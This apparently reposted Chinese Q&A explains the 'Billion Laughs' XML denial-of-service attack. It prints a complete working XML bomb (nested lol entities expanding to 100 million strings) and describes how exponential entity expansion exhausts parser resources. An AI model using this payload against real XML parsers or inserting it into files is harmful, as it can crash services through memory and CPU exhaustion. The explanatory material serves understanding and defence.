xml – 十亿笑 – DoS攻击

前端之家收集整理的这篇文章主要介绍了xml – 十亿笑 – DoS攻击前端之家小编觉得挺不错的,现在分享给大家,也给大家做个参考。
<!DOCTYPE root [
 <!ENTITY ha "Ha !">
 <!ENTITY ha2 "&ha; &ha;">
 <!ENTITY ha3 "&ha2; &ha2;">
 <!ENTITY ha4 "&ha3; &ha3;">
 <!ENTITY ha5 "&ha4; &ha4;">
 ...
 <!ENTITY ha128 "&ha127; &ha127;">
 ]>
 <root>&ha128;</root>

据说这叫做十亿笑DoS攻击。

有没有人知道它是如何工作的?

Billion Laughs攻击是针对XML解析器的拒绝服务攻击。 Billion Laughs攻击也被称为XML炸弹,或更深奥地,指数实体扩展攻击。即使使用格式良好的XML也可能发生Billion Laughs攻击,并且还可以传递XML模式验证。

在以下所示的XML文件中说明了vanilla Billion Laughs攻击。

<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

在这个例子中,有10个不同的XML实体,lol-lol9。第一个实体,lol被定义为字符串“lol”。然而,每个其他实体被定义为另一个实体的10。此XML文件的文档内容部分仅包含对实体lol9的一个实例的引用。然而,当由DOM或SAX解析器解析时,当遇到lol9时,它被扩展为10个los,每个扩展为10个los,等等。到一切都被扩展到文本lol时,有100,000,000个字符串“lol”的实例。如果还有一个实体,或者lol被定义为10个“lol”字符串,则会有一个十亿的“lol”,因此攻击的名称。不用说,这种扩展消耗了指数数量的资源和时间,导致DOS。

我的blog有更广泛的解释。

原文链接:https://www.f2er.com/xml/293716.html

猜你在找的XML相关文章